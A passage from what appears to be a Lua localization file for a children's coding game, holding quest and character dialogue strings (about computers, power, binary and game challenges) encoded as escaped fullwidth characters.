\239\189\140\239\189\143\239\189\143\239\189\139 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\144\239\189\140\239\189\129\239\189\142\239\189\148\239\189\147 \239\189\143\239\189\146 \239\189\135\239\189\129\239\189\140\239\189\129\239\189\152\239\189\137\239\189\133\239\189\147.",
["questComplete"] = "\239\188\177\239\189\149\239\189\133\239\189\147\239\189\148 \239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133",
["activeQuests"] = "\239\188\161\239\189\131\239\189\148\239\189\137\239\189\150\239\189\133 \239\188\177\239\189\149\239\189\133\239\189\147\239\189\148\239\189\147",
["mrInfoQuest3"] = "\239\188\171\239\189\133\239\189\133\239\189\144 \239\189\133\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132. \239\188\163\239\189\143\239\189\141\239\189\133 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\129\239\189\142\239\189\132 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\141\239\189\133 \239\189\151\239\189\136\239\189\133\239\189\142 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\132\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\142 \239\189\136\239\189\129\239\189\140\239\189\134 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\137\239\189\147\239\189\140\239\189\129\239\189\142\239\189\132.",
["mrInfoQuest2"] = "\239\188\180\239\189\143 \239\189\132\239\189\133\239\189\134\239\189\133\239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\183\239\189\136\239\189\137\239\189\148\239\189\133 \239\188\178\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\153\239\189\143\239\189\149'\239\189\140\239\189\140 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140-\239\189\149\239\189\144. \239\188\181\239\189\142\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146'\239\189\147 \239\189\147\239\189\133\239\189\131\239\189\146\239\189\133\239\189\148\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\142\239\189\145\239\189\149\239\189\133\239\189\146 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\148\239\189\143 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\129 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146. \239\188\169 \239\189\147\239\189\129\239\189\151 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\136\239\189\137\239\189\148\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\130\239\189\143\239\189\149\239\189\142\239\189\131\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\134\239\189\134 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148, \239\189\148\239\189\143\239\189\151\239\189\129\239\189\146\239\189\132\239\189\147 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148. \239\188\169\239\189\148 \239\189\141\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\130\239\189\133 \239\189\151\239\189\137\239\189\147\239\189\133 \239\189\148\239\189\143 \239\189\134\239\189\143\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\137\239\189\148 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\133\239\189\133 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\148'\239\189\147 \239\189\149\239\189\144 \239\189\148\239\189\143.",
["mrInfoQuest1"] = "\239\188\168\239\189\133\239\189\140\239\189\140\239\189\143 $1. \239\188\183\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146. \239\188\180\239\189\136\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\133\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\133 \239\189\129\239\189\142\239\189\132 \239\189\141\239\189\129\239\189\139\239\189\133, \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\134\239\189\149\239\189\140 \239\189\153\239\189\143\239\189\149'\239\189\140\239\189\140 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\133. \239\188\175\239\189\144\239\189\133\239\189\142 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\141\239\189\129\239\189\144 \239\189\148\239\189\143 \239\189\147\239\189\133\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132.",
["audioQuestComplete"] = "\239\188\172\239\189\133\239\189\129\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146, \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\141\239\189\149\239\189\147\239\189\137\239\189\131.",
["newsboard"] = "- - - \239\188\172\239\188\161\239\188\180\239\188\165\239\188\179\239\188\180 \239\188\174\239\188\165\239\188\183\239\188\179 - - -\010\239\188\180\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148 \239\189\136\239\189\129\239\189\147 \239\189\130\239\189\133\239\189\133\239\189\142 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\148! \239\188\166\239\189\143\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\129\239\189\148\239\189\136 \239\189\132\239\189\143\239\189\151\239\189\142 \239\189\147\239\189\143\239\189\149\239\189\148\239\189\136 \239\189\129\239\189\142\239\189\132 \239\189\150\239\189\137\239\189\133\239\189\151 \239\189\148\239\189\136\239\189\133 \239\188\172\239\188\165\239\188\164. \010\239\188\168\239\188\164 \239\188\168\239\189\137\239\189\140\239\189\140 \239\189\136\239\189\129\239\189\147 \239\189\142\239\189\143\239\189\151 \239\189\143\239\189\144\239\189\133\239\189\142\239\189\133\239\189\132. \239\188\167\239\189\143 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\133\239\189\129\239\189\147\239\189\148 \239\189\143\239\189\134 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\172\239\189\129\239\189\139\239\189\133 \239\189\129\239\189\142\239\189\132 \239\189\134\239\189\143\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133\239\189\147 \239\189\148\239\189\143 \239\189\147\239\189\133\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\137\239\189\135\239\189\136\239\189\148\239\189\147. \010\010\239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\136\239\189\129\239\189\147 \239\189\129\239\189\140\239\189\147\239\189\143 \239\189\143\239\189\144\239\189\133\239\189\142\239\189\133\239\189\132 \239\189\137\239\189\148\239\189\147 \239\188\179\239\189\143\239\189\149\239\189\142\239\189\132 \239\188\176\239\189\143\239\189\146\239\189\148. \239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\132\239\189\137\239\189\147\239\189\131\239\189\143 \239\189\129\239\189\142\239\189\132 \239\189\138\239\189\143\239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\129\239\189\146\239\189\148\239\189\153.",
["portether03houseTetra"] = "\239\188\169'\239\189\141 \239\189\140\239\189\143\239\189\143\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\143\239\189\146 \239\189\137\239\189\142\239\189\134\239\189\143\239\189\146\239\189\141\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\143\239\189\142 \239\188\173\239\189\133\239\189\141\239\189\143\239\189\146\239\189\153 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147. \239\188\161\239\189\144\239\189\144\239\189\129\239\189\146\239\189\133\239\189\142\239\189\148\239\189\140\239\189\153 \239\189\137\239\189\148 \239\189\136\239\189\129\239\189\147 1\239\188\167\239\188\162 \239\188\178\239\188\161\239\188\173 - \239\189\148\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\129 \239\189\148\239\189\143\239\189\148\239\189\129\239\189\140 \239\189\143\239\189\134 8,589,934,592 \239\189\130\239\189\137\239\189\148\239\189\147 \239\189\143\239\189\134 \239\189\132\239\189\129\239\189\148\239\189\129. \239\188\163\239\189\146\239\189\129\239\189\154\239\189\153 \239\189\136\239\189\149\239\189\136?",
["discovered"] = "\239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132",
["plainsProfessor"] = "\239\188\175\239\189\136, \239\189\136\239\189\133\239\189\140\239\189\140\239\189\143. \239\188\169'\239\189\141 \239\189\143\239\189\142 \239\189\129\239\189\142 \239\189\133\239\189\152\239\189\144\239\189\133\239\189\132\239\189\137\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\148\239\189\143 \239\189\146\239\189\133\239\189\147\239\189\133\239\189\129\239\189\146\239\189\131\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\137\239\189\146\239\189\131\239\189\149\239\189\137\239\189\148 \239\189\130\239\189\143\239\189\129\239\189\146\239\189\132. \239\188\169'\239\189\141 \239\189\144\239\189\140\239\189\129\239\189\142\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\132\239\189\137\239\189\135 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\134\239\189\137\239\189\130\239\189\133\239\189\146\239\189\135\239\189\140\239\189\129\239\189\147\239\189\147 \239\189\148\239\189\143 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\144\239\189\144\239\189\133\239\189\146 \239\189\131\239\189\143\239\189\146\239\189\133!",
["llNerd"] = "\239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\133\239\189\140\239\189\144 \239\189\141\239\189\133? \239\188\169'\239\189\141 \239\189\147\239\189\148\239\189\149\239\189\132\239\189\153\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\129 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146, \239\189\130\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\129\239\189\146\239\189\133 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\147\239\189\133\239\189\131\239\189\146\239\189\133\239\189\148 \239\189\147\239\189\131\239\189\146\239\189\143\239\189\140\239\189\140\239\189\147 \239\188\169 \239\189\142\239\189\133\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 \239\189\149\239\189\144.",
["powerOutside"] = "\239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\150\239\189\137\239\189\147\239\189\137\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148 \239\189\148\239\189\143\239\189\143? \239\188\164\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\136\239\189\143\239\189\140\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\137\239\189\147 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\130\239\189\153 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\130\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136\239\189\148 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\133\239\189\132 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133?",
["coveArea"] = "\239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\129\239\189\148\239\189\136",
["jungleAsterixHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\161\239\189\147\239\189\148\239\189\133\239\189\146\239\189\137\239\189\152 \239\189\137\239\189\142 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133.",
["jungleAsterixHelp2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 2 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133.",
["audioQuestHelp"] = "\239\188\166\239\189\137\239\189\142\239\189\132 \239\188\170\239\189\129\239\189\131\239\189\139 \239\189\137\239\189\142 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146.",
["powerOutside3"] = "\239\188\162\239\189\133\239\189\131\239\189\129\239\189\149\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\131\239\189\129\239\189\142 \239\189\135\239\189\133\239\189\148 \239\189\131\239\189\143\239\189\146\239\189\146\239\189\149\239\189\144\239\189\148\239\189\133\239\189\132 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\129\239\189\149\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\140\239\189\143\239\189\147\239\189\133 \239\189\137\239\189\148\239\189\147 \239\189\141\239\189\133\239\189\141\239\189\143\239\189\146\239\189\137\239\189\133\239\189\147. \239\188\164\239\189\133\239\189\134\239\189\137\239\189\142\239\189\137\239\189\148\239\189\133\239\189\140\239\189\153 \239\189\151\239\189\143\239\189\146\239\189\148\239\189\136 \239\189\147\239\189\136\239\189\149\239\189\148\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\132\239\189\143\239\189\151\239\189\142 \239\189\144\239\189\146\239\189\143\239\189\144\239\189\133\239\189\146\239\189\140\239\189\153!",
["powerOutside2"] = "\239\188\169 \239\189\136\239\189\133\239\189\129\239\189\146 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\136\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\142\239\189\133\239\189\150\239\189\133\239\189\146 \239\189\144\239\189\149\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133 \239\189\143\239\189\149\239\189\148 \239\189\151\239\189\137\239\189\148\239\189\136\239\189\143\239\189\149\239\189\148 \239\189\147\239\189\136\239\189\149\239\189\148\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\132\239\189\143\239\189\151\239\189\142 \239\189\134\239\189\137\239\189\146\239\189\147\239\189\148.",
["Vertex"] = "\239\188\163\239\189\149\239\189\146\239\189\129\239\189\148\239\189\143\239\189\146",
["pongQuest3"] = "\239\188\174\239\189\137\239\189\131\239\189\133 \239\189\138\239\189\143\239\189\130. \239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\143\239\189\142 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\143 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\129 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146. \239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\137\239\189\133\239\189\132 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\129\239\189\141\239\189\129\239\189\154\239\189\137\239\189\142\239\189\135 \239\188\176\239\189\143\239\189\142\239\189\135 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142?",
["minesFrightenedBoy"] = "\239\188\183\239\189\143\239\189\151, \239\189\132\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\129 \239\189\147\239\189\136\239\189\133\239\189\140\239\189\148\239\189\133\239\189\146 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\129\239\189\144 \239\189\143\239\189\134 \239\189\129 \239\189\139\239\189\133\239\189\153 \239\189\137\239\189\142 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148?",
["hdmiInterviewFinal"] = "\239\188\175\239\188\171! \239\188\180\239\189\136\239\189\129\239\189\142\239\189\139\239\189\147 \239\189\134\239\189\143\239\189\146 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\148\239\189\137\239\189\141\239\189\133 $1. \239\188\174\239\189\133\239\189\152\239\189\148 \239\189\149\239\189\144: \239\188\168\239\189\143\239\189\151 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140\239\189\147 \239\189\132\239\189\143\239\189\151\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\153\239\189\133\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133 \239\189\129\239\189\148 \239\189\142\239\189\133\239\189\129\239\189\146 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\133\239\189\132 \239\189\143\239\189\134 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148! \239\188\179\239\189\148\239\189\129\239\189\153 \239\189\148\239\189\149\239\189\142\239\189\133\239\189\132.",
["hdmiInterview2b"] = "\239\188\174\239\189\143",
["termsitionTerminal1"] = "\239\188\185\239\189\143\239\189\149 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\137\239\189\148! \239\188\168\239\189\133\239\189\146\239\189\133, \239\189\130\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\189\135\239\189\133\239\189\148\239\189\147 \239\189\148\239\189\149\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147. \239\188\180\239\189\136\239\189\133\239\189\142 \239\189\151\239\189\133 \239\189\131\239\189\129\239\189\142 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\129 \239\189\131\239\189\136\239\189\129\239\189\146\239\189\129\239\189\131\239\189\148\239\189\133\239\189\146, \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\129 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140 \239\189\134\239\189\143\239\189\146\239\189\141.",
["hdmiInterview2a"] = "\239\188\162\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\188\162\239\189\143\239\189\146\239\189\132\239\189\133\239\189\146",
["interested"] = "\239\188\169'\239\189\141 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\133\239\189\147\239\189\148\239\189\133\239\189\132",
["portether03houseLazyBoy"] = "\239\188\169\239\189\134 \239\189\130\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\189\137\239\189\147 \239\189\149\239\189\147\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\144\239\189\137\239\189\131\239\189\148\239\189\149\239\189\146\239\189\133\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132, \239\189\147\239\189\149\239\189\146\239\189\133\239\189\140\239\189\153 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\134\239\189\143\239\189\143\239\189\132 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\137\239\189\148, \239\188\169'\239\189\141 \239\189\147\239\189\148\239\189\129\239\189\146\239\189\150\239\189\137\239\189\142\239\189\135. \239\188\183\239\189\136\239\189\129\239\189\148? \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142'\239\189\148? \239\188\175\239\189\136.",
["triangle"] = "\239\188\180\239\189\146\239\189\137\239\189\129\239\189\142\239\189\135\239\189\140\239\189\133",
["MissWatts"] = "\239\188\173\239\189\137\239\189\147\239\189\147 \239\188\183\239\189\129\239\189\148\239\189\148\239\189\147",
["etherstationWorriedBoy"] = "\239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\147\239\189\133\239\189\142\239\189\132 \239\189\144\239\189\129\239\189\131\239\189\139\239\189\133\239\189\148\239\189\147 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\181\239\188\164\239\188\176 \239\189\148\239\189\146\239\189\129\239\189\137\239\189\142. \239\188\169'\239\189\141 \239\189\147\239\189\133\239\189\142\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\142\239\189\133 \239\189\148\239\189\143 \239\189\141\239\189\153 \239\189\134\239\189\146\239\189\137\239\189\133\239\189\142\239\189\132 \239\188\165\239\189\140\239\189\133\239\189\129\239\189\142\239\189\143\239\189\146. \239\188\169 \239\189\136\239\189\143\239\189\144\239\189\133 \239\189\147\239\189\136\239\189\133 \239\189\135\239\189\133\239\189\148\239\189\147 \239\189\137\239\189\148...",
["caroline2"] = "\239\188\176\239\189\140\239\189\133\239\189\129\239\189\147\239\189\133 \239\189\137\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\151\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\136\239\189\129\239\189\144\239\189\144\239\189\133\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\142 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142. \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\133\239\189\142\239\189\148\239\189\133\239\189\146 \239\189\130\239\189\153 \239\189\147\239\189\147\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133.",
["gregory2"] = "\239\188\168\239\189\141\239\189\141 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\142\239\189\143\239\189\148 \239\189\134\239\189\137\239\189\142\239\189\137\239\189\147\239\189\136\239\189\133\239\189\132 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\176\239\189\143\239\189\142\239\189\135? \239\188\169\239\189\148'\239\189\147 \239\189\129 \239\189\135\239\189\146\239\189\133\239\189\129\239\189\148 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 \239\189\149\239\189\144 \239\189\129\239\189\142\239\189\132 \239\189\133\239\189\129\239\189\146\239\189\142 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147! \239\188\185\239\189\143\239\189\149'\239\189\140\239\189\140 \239\189\142\239\189\133\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\133\239\189\141.",
["gregory1"] = "\239\188\176\239\189\143\239\189\142\239\189\135 \239\189\141\239\189\129\239\189\153 \239\189\147\239\189\133\239\189\133\239\189\141 \239\189\147\239\189\137\239\189\141\239\189\144\239\189\140\239\189\133, \239\189\130\239\189\149\239\189\148 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\137\239\189\148\239\189\147 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\129\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133'\239\189\147 \239\189\142\239\189\143 \239\189\147\239\189\148\239\189\143\239\189\144\239\189\144\239\189\137\239\189\142\239\189\135 \239\189\153\239\189\143\239\189\149. \239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\161\239\189\140\239\189\140\239\189\129\239\189\142 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\143\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\136\239\189\149\239\189\148 \239\189\148\239\189\143 \239\189\148\239\189\146\239\189\153 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\176\239\189\143\239\189\142\239\189\135.",
["makeArtQuizWelcome"] = "\239\188\180\239\189\146\239\189\153 \239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\145\239\189\149\239\189\137\239\189\154?",
["tempNoInternetCopy"] = "\239\188\169\239\189\142\239\189\148\239\189\133\239\189\146\239\189\142\239\189\133\239\189\148 \239\189\131\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\142\239\189\143\239\189\148 \239\189\134\239\189\143\239\189\149\239\189\142\239\189\132. \239\188\163\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148 \239\189\142\239\189\143\239\189\151?",
["hdmiInterview21"] = "\239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\137\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\148 \239\189\148\239\189\143\239\189\143? \239\188\183\239\189\133'\239\189\146\239\189\133 \239\189\147\239\189\148\239\189\137\239\189\140\239\189\140 \239\189\148\239\189\146\239\189\153\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\134\239\189\137\239\189\135\239\189\149\239\189\146\239\189\133 \239\189\143\239\189\149\239\189\148 \239\189\151\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\142, \239\189\147\239\189\143 \239\189\129\239\189\142\239\189\153 \239\189\137\239\189\142\239\189\134\239\189\143\239\189\146\239\189\141\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\130\239\189\133 \239\189\150\239\189\129\239\189\140\239\189\149\239\189\129\239\189\130\239\189\140\239\189\133 \239\189\148\239\189\143 \239\189\143\239\189\149\239\189\146 \239\189\150\239\189\137\239\189\133\239\189\151\239\189\133\239\189\146\239\189\147. \010\239\188\164\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\137\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\133\239\189\147 \239\189\134\239\189\146\239\189\143\239\189\141?",
